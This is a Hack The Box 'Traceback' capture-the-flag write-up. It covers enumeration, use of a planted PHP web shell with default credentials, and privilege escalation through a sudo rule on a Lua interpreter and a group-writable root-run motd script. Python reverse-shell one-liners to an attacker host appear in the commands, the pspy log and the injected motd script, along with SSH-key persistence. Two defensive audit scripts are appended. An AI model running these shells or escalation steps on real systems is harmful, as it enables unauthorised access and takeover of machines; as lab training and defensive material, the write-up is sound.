HTB Traceback

$nmap -A -T4 -p- 10.10.10.181

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-08 15:08 CET
Nmap scan report for 10.10.10.181
Host is up (0.040s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.85 seconds

Open ports:

  • 22/tcp open ssh OpenSSH 7.6p1 Ubuntu
  • 80/tcp open http Apache httpd 2.4.29

Access to http://10.10.10.181

This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
- Xh4H -
<body>
    <center>
        <h1>This site has been owned</h1>
        <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
        <h3> - Xh4H - </h3>
        <!--Some of the best web shells that you might need ;)-->
    </center>
</body>

Can we assume that there is a Web-shell in this box?

Let’s try to find out.

$gobuster dir -u http://10.10.10.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/08 15:13:48 Starting gobuster
===============================================================
http://10.10.10.181/server-status (Status: 403)
===============================================================
2020/12/08 15:30:56 Finished
===============================================================

With our usual wordlist there are no interesting results.

Let’s try a different one, taking into account the comment on the main page that mentioned web shells…

$gobuster dir -u http://10.10.10.181 -w ~/tools/SecLists/Web-Shells/backdoor_list.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.181
[+] Threads:        10
[+] Wordlist:       /home/ruben/tools/SecLists/Web-Shells/backdoor_list.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/12/08 15:39:33 Starting gobuster
===============================================================
http://10.10.10.181/smevk.php (Status: 200)
===============================================================
2020/12/08 15:39:38 Finished
===============================================================

Using a wordlist specific to web shells, we obtain one result: smevk.php

Following the hint «some of the best web shells that you might need», a Google search leads to this repository: https://github.com/TheBinitGhimire/Web-Shells

There we can find the source code of the shell:
https://github.com/TheBinitGhimire/Web-Shells/blob/master/PHP/smevk.php

Default credentials are: admin/admin

From this web-shell, we can obtain a reverse shell to get better access to the box.

$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

$nc -lvnp 1234

listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.181] 43042
webadmin@traceback:/var/www/html$

Once we are inside the box, we need to enumerate what we can find.

webadmin@traceback:/var/www/html$ cd /home/webadmin
webadmin@traceback:/home/webadmin$ ls

note.txt

webadmin@traceback:/home/webadmin$ cat note.txt

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

webadmin@traceback:/home/webadmin$ cat .bash_history

ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

Let’s check which commands the user can run with sudo:

webadmin@traceback:/home/webadmin$ sudo -l

Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

User webadmin can run /home/sysadmin/luvit as sysadmin through sudo, without a password.

We can use this to run a system command through Lua’s os.execute function (https://www.lua.org/pil/22.2.html):

...
The function os.execute runs a system command.
...

webadmin@traceback:/home/webadmin$ echo "os.execute('/bin/bash');" > lat_mov.lua

lat_mov.lua is a new Lua script that will execute bash.

webadmin@traceback:/home/webadmin$ ls -la

total 48
drwxr-x--- 5 webadmin sysadmin 4096 Dec 10 02:46 .
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ..
-rw------- 1 webadmin webadmin  105 Mar 16  2020 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27  2020 .ssh
-rw-r--r-- 1 webadmin webadmin   25 Dec 10 02:46 lat_mov.lua
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16  2020 note.txt

webadmin@traceback:/home/webadmin$ cat lat_mov.lua

os.execute('/bin/bash');

webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit ./lat_mov.lua

sysadmin@traceback:/home/webadmin$

sysadmin@traceback:~$ cat user.txt

f216XXXXXXXXXXXXXXXXXXXXXXXXXXXX
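The sudo rule above is the whole escalation path: the permitted command is an interpreter sitting in a home directory, so any script handed to it runs as sysadmin. The following audit script is an added example, not part of the original write-up: it parses `sudo -l` output and flags exactly those conditions (NOPASSWD, an interpreter as the allowed command, a binary outside secure_path). The `audit_sudo_rules` function and the interpreter list are my own.

```python
import re
from pathlib import PurePosixPath

# Interpreters and shells: a sudo rule on any of these is equivalent to a full
# shell as the run-as user, because the caller chooses the script they execute.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3",
                "perl", "ruby", "node", "lua", "luajit", "luvit", "php"}

# Constructed sample: the `sudo -l` output shown on this page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
"""

# "(runas) TAG: TAG: /path args" as printed by `sudo -l`
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_secure_path(text):
    """Directories sudo trusts for commands; `sudo -l` prints the colons escaped."""
    m = re.search(r"secure_path=(\S+)", text)
    return m.group(1).replace("\\:", ":").split(":") if m else []

def audit_sudo_rules(text):
    """Return (command, reason) findings for risky rules in `sudo -l` output."""
    secure_dirs = parse_secure_path(text)
    findings, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True          # rules follow the "User X may run" header
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas")
        for entry in m.group("cmd").split(","):
            if not entry.strip():
                continue
            path = entry.strip().split()[0]
            p = PurePosixPath(path)
            if "NOPASSWD" in m.group("tags"):
                findings.append((path, "NOPASSWD: no re-authentication before escalation"))
            if p.name in INTERPRETERS:
                findings.append((path, f"interpreter '{p.name}' gives an arbitrary shell as {runas}"))
            if secure_dirs and str(p.parent) not in secure_dirs:
                findings.append((path, f"lives in {p.parent}, outside secure_path"))
    return findings

if __name__ == "__main__":
    for path, reason in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{path}: {reason}")
```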

To get a more convenient connection, we can create an SSH key for sysadmin and then connect directly over SSH.

$ssh-keygen -t rsa -f sysadmin.key

Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sysadmin.key
Your public key has been saved in sysadmin.key.pub
The key fingerprint is:
SHA256:0Iv6aGhkA1zV6gYkY+L66b+MAQq0+X2SSjgs5ANUMvU ruben@parrot
The key's randomart image is:
+---[RSA 3072]----+
| o.o...          |
|.++o.  o         |
|=o=  Eo .        |
|+oo. . o .       |
|==  o . S        |
|O.* .+.          |
|oX.*o+ .         |
|. O+ooo          |
| oo+=..          |
+----[SHA256]-----+

$ls

sysadmin.key sysadmin.key.pub

$cat sysadmin.key.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCg2lqkL9PS6ztePiGJhyYEueCLTlwULfrb3dvjshdyNFzweEGDDqAMPTEj0BcuDhIMlHsuKQGlyvyUaVAeejQ2abqwvF/OX2UelFxXKeodNnxm7GQtlr/y8hC2SNbLQYMmNiyBW9zmvvro0QfVJSna3Gdl+JS5aFaARLfK/Prw/mimBeIZ6+HzBO6Z6hM+6MA4kBIFwawQfLDs/Chx0h9hPmTbaY+iHvJYdBYW6tUKNa3p6mbKJWK/64LztUG2g/QHWnmIDQ3w1DysS4K4/Up+xyCxkxzT0ChBabI0by8dDZZ82N9z/bCJBnb4yhXYJtmUjr98fS2U2d9Qsu57AlJCQGVImk00VsuLfHVH9o9neJ/8xajPDGRiH/XgoJDTJ2xipf/DSbw+d1KBAYLZVllkPKx6jMrDoIZO+kn8eDfGxCSKt+aX0Sav7zY+P9PEWA3ICUQ1eHHhi1sqqmtPQ45/NPTiJrOGXNuEFdha9Ga6br/5wy5ZhLQh/NLCbHw1Pm8= ruben@parrot

To get this key working, we need to add it to sysadmin’s authorized_keys file.

sysadmin@traceback:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCg2lqkL9PS6ztePiGJhyYEueCLTlwULfrb3dvjshdyNFzweEGDDqAMPTEj0BcuDhIMlHsuKQGlyvyUaVAeejQ2abqwvF/OX2UelFxXKeodNnxm7GQtlr/y8hC2SNbLQYMmNiyBW9zmvvro0QfVJSna3Gdl+JS5aFaARLfK/Prw/mimBeIZ6+HzBO6Z6hM+6MA4kBIFwawQfLDs/Chx0h9hPmTbaY+iHvJYdBYW6tUKNa3p6mbKJWK/64LztUG2g/QHWnmIDQ3w1DysS4K4/Up+xyCxkxzT0ChBabI0by8dDZZ82N9z/bCJBnb4yhXYJtmUjr98fS2U2d9Qsu57AlJCQGVImk00VsuLfHVH9o9neJ/8xajPDGRiH/XgoJDTJ2xipf/DSbw+d1KBAYLZVllkPKx6jMrDoIZO+kn8eDfGxCSKt+aX0Sav7zY+P9PEWA3ICUQ1eHHhi1sqqmtPQ45/NPTiJrOGXNuEFdha9Ga6br/5wy5ZhLQh/NLCbHw1Pm8=" >>/home/sysadmin/.ssh/authorized_keys

$chmod 400 sysadmin.key
$ssh -i sysadmin.key sysadmin@10.10.10.181

The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

$ whoami

sysadmin

Now, as sysadmin, we can enumerate again.
This time we can run pspy.

Pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

sysadmin@traceback:~$ ./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
...
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/12/10 03:34:23 CMD: UID=1000 PID=999    | python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash") 
2020/12/10 03:34:23 CMD: UID=1000 PID=998    | sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 
2020/12/10 03:34:23 CMD: UID=0    PID=99     | 
2020/12/10 03:34:23 CMD: UID=1000 PID=788    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=7      | 
2020/12/10 03:34:23 CMD: UID=1000 PID=563    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=562    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=561    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=1000 PID=560    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=56     | 
2020/12/10 03:34:23 CMD: UID=1000 PID=559    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=555    | /usr/sbin/apache2 -k start 
2020/12/10 03:34:23 CMD: UID=0    PID=55     | 
2020/12/10 03:34:23 CMD: UID=0    PID=510    | /usr/sbin/sshd -D 
2020/12/10 03:34:23 CMD: UID=0    PID=51     | 
2020/12/10 03:34:23 CMD: UID=0    PID=495    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/12/10 03:34:23 CMD: UID=0    PID=49     | 
2020/12/10 03:34:23 CMD: UID=0    PID=45     | 
2020/12/10 03:34:23 CMD: UID=102  PID=440    | /usr/sbin/rsyslogd -n 
2020/12/10 03:34:23 CMD: UID=0    PID=44     | 
2020/12/10 03:34:23 CMD: UID=0    PID=438    | /usr/sbin/cron -f 
2020/12/10 03:34:23 CMD: UID=0    PID=436    | /lib/systemd/systemd-logind 
2020/12/10 03:34:23 CMD: UID=0    PID=43     | 
2020/12/10 03:34:23 CMD: UID=103  PID=412    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/12/10 03:34:23 CMD: UID=0    PID=410    | /usr/lib/accountsservice/accounts-daemon 
2020/12/10 03:34:23 CMD: UID=0    PID=41     | 
2020/12/10 03:34:23 CMD: UID=0    PID=409    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2020/12/10 03:34:23 CMD: UID=0    PID=408    | /usr/sbin/irqbalance --foreground 
2020/12/10 03:34:23 CMD: UID=0    PID=40     | 
2020/12/10 03:34:23 CMD: UID=0    PID=4      | 
2020/12/10 03:34:23 CMD: UID=0    PID=398    | /usr/bin/vmtoolsd 
2020/12/10 03:34:23 CMD: UID=101  PID=396    | /lib/systemd/systemd-resolved 
2020/12/10 03:34:23 CMD: UID=62583 PID=394   | /lib/systemd/systemd-timesyncd 
2020/12/10 03:34:23 CMD: UID=0    PID=392    | /usr/bin/VGAuthService 
2020/12/10 03:34:23 CMD: UID=0    PID=39     | 
2020/12/10 03:34:23 CMD: UID=0    PID=31     | 
2020/12/10 03:34:23 CMD: UID=100  PID=306    | /lib/systemd/systemd-networkd 
2020/12/10 03:34:23 CMD: UID=0    PID=303    | vmware-vmblock-fuse /run/vmblock-fuse -o rw,subtype=vmware-vmblock,default_permissions,allow_other,dev,suid 
2020/12/10 03:34:23 CMD: UID=0    PID=30     | 
2020/12/10 03:34:23 CMD: UID=0    PID=277    | 
2020/12/10 03:34:23 CMD: UID=0    PID=276    | /lib/systemd/systemd-udevd 
2020/12/10 03:34:23 CMD: UID=0    PID=27     | 
2020/12/10 03:34:23 CMD: UID=0    PID=260    | /lib/systemd/systemd-journald 
2020/12/10 03:34:23 CMD: UID=0    PID=26     | 
2020/12/10 03:34:23 CMD: UID=0    PID=18     | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1706   | ./pspy64 
2020/12/10 03:34:23 CMD: UID=0    PID=1704   | sleep 30 
2020/12/10 03:34:23 CMD: UID=0    PID=1703   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:34:23 CMD: UID=0    PID=1700   | /usr/sbin/CRON -f 
2020/12/10 03:34:23 CMD: UID=0    PID=17     | 
2020/12/10 03:34:23 CMD: UID=0    PID=1686   | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1651   | bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1627   | -sh 
2020/12/10 03:34:23 CMD: UID=1001 PID=1626   | sshd: sysadmin@pts/1 
2020/12/10 03:34:23 CMD: UID=1001 PID=1602   | (sd-pam) 
2020/12/10 03:34:23 CMD: UID=1001 PID=1601   | /lib/systemd/systemd --user 
2020/12/10 03:34:23 CMD: UID=0    PID=16     | 
2020/12/10 03:34:23 CMD: UID=0    PID=1599   | sshd: sysadmin [priv]
2020/12/10 03:34:23 CMD: UID=0    PID=15     | 
2020/12/10 03:34:23 CMD: UID=0    PID=13     | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1266   | bash -i 
2020/12/10 03:34:23 CMD: UID=0    PID=1237   | 
2020/12/10 03:34:23 CMD: UID=1001 PID=1168   | /bin/bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1167   | sh -c /bin/bash 
2020/12/10 03:34:23 CMD: UID=1001 PID=1162   | /home/sysadmin/luvit ./lat_mov.lua 
2020/12/10 03:34:23 CMD: UID=0    PID=1161   | sudo -u sysadmin /home/sysadmin/luvit ./lat_mov.lua 
2020/12/10 03:34:23 CMD: UID=0    PID=1126   | 
2020/12/10 03:34:23 CMD: UID=0    PID=101    | 
2020/12/10 03:34:23 CMD: UID=1000 PID=1000   | /bin/bash 
2020/12/10 03:34:23 CMD: UID=0    PID=100    | 
2020/12/10 03:34:23 CMD: UID=0    PID=1      | /sbin/init noprompt 
2020/12/10 03:34:31 CMD: UID=???  PID=1719   | ???
2020/12/10 03:35:01 CMD: UID=???  PID=1725   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1724   | sleep 30 
2020/12/10 03:35:01 CMD: UID=???  PID=1723   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1722   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:35:01 CMD: UID=???  PID=1721   | ???
2020/12/10 03:35:01 CMD: UID=0    PID=1720   | /usr/sbin/CRON -f

Analysing these results, some interesting lines are repeated:

2020/12/10 03:34:23 CMD: UID=0    PID=1703   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:35:01 CMD: UID=0    PID=1722   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:36:01 CMD: UID=0    PID=1731   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/12/10 03:37:01 CMD: UID=0    PID=1737   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

sysadmin@traceback:~$ ls -la /etc/update-motd.d/

total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16  2020 ..
-rwxrwxr-x  1 root sysadmin  981 Dec 10 03:49 00-header
-rwxrwxr-x  1 root sysadmin  982 Dec 10 03:49 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Dec 10 03:49 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Dec 10 03:49 80-esm
-rwxrwxr-x  1 root sysadmin  299 Dec 10 03:49 91-release-upgrade

sysadmin@traceback:/etc/update-motd.d$ cat 00-header

#!/bin/sh
#
#  00-header - create the header of the MOTD
#  Copyright (C) 2009-2010 Canonical Ltd.
#
#  Authors: Dustin Kirkland <kirkland@canonical.com>
#
#  This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

echo "\nWelcome to Xh4H land \n"

Every time sysadmin logs in, this file is executed as root, so the «echo» command runs as root.
Therefore, we can modify this file to obtain a root reverse shell.

We use & to background the task so that the SSH login is not blocked waiting for the command to finish.

sysadmin@traceback:/etc/update-motd.d$ nano 00-header

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.2",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' &

$nc -lnvp 9999

listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.181] 46640
root@traceback:/#

root@traceback:/# whoami

root

root@traceback:/# cat /root/root.txt

e7e1XXXXXXXXXXXXXXXXXXXXXXXXXXXX
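The root cause of this last step is a directory of root-executed scripts (/etc/update-motd.d, kept in sync by cron from /var/backups/.update-motd.d) whose files are writable by a non-root group. The following check is an added example, not part of the original write-up: it flags any such script or directory. The entries in PAGE_LISTING are transcribed from the `ls -la /etc/update-motd.d/` output above; the uid/gid numbers (root = 0, sysadmin = 1001, as pspy reported UID=1001 for the sysadmin session) are assumptions.

```python
import stat
from pathlib import Path

# Constructed sample, transcribed from the `ls -la /etc/update-motd.d/` listing
# on this page: (name, mode, uid, gid). Assumed: uid 0 = root, gid 1001 = sysadmin.
PAGE_LISTING = [
    ("00-header", 0o100775, 0, 1001),
    ("10-help-text", 0o100775, 0, 1001),
    ("50-motd-news", 0o100775, 0, 1001),
    ("80-esm", 0o100775, 0, 1001),
    ("91-release-upgrade", 0o100775, 0, 1001),
]

def writable_by_non_root(mode, uid, gid):
    """Reasons a non-root principal could modify a file that root executes."""
    reasons = []
    if uid != 0:
        reasons.append(f"owned by uid {uid}; owner can rewrite it")
    if mode & stat.S_IWGRP and gid != 0:
        reasons.append(f"group-writable by gid {gid} (not root)")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_entries(entries):
    """entries: iterable of (name, mode, uid, gid). Returns {name: [reasons]}."""
    findings = {}
    for name, mode, uid, gid in entries:
        reasons = writable_by_non_root(mode, uid, gid)
        if reasons:
            findings[name] = reasons
    return findings

def audit_root_script_dir(directory):
    """Stat every regular file in a root-executed script directory, e.g.
    /etc/update-motd.d, or the cron copy source /var/backups/.update-motd.d."""
    d = Path(directory)
    st = d.stat()
    # The directory itself: if it is writable, new scripts can simply be dropped in.
    entries = [(str(d) + "/", st.st_mode, st.st_uid, st.st_gid)]
    for f in sorted(d.iterdir()):
        if f.is_file():
            st = f.stat()
            entries.append((str(f), st.st_mode, st.st_uid, st.st_gid))
    return audit_entries(entries)

if __name__ == "__main__":
    for name, reasons in audit_entries(PAGE_LISTING).items():
        print(f"{name}: {'; '.join(reasons)}")
    if Path("/etc/update-motd.d").is_dir():
        for name, reasons in audit_root_script_dir("/etc/update-motd.d").items():
            print(f"{name}: {'; '.join(reasons)}")
```

Run as root on a live host to check the real directory; a clean Ubuntu install reports nothing, because these scripts are root:root 0755.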
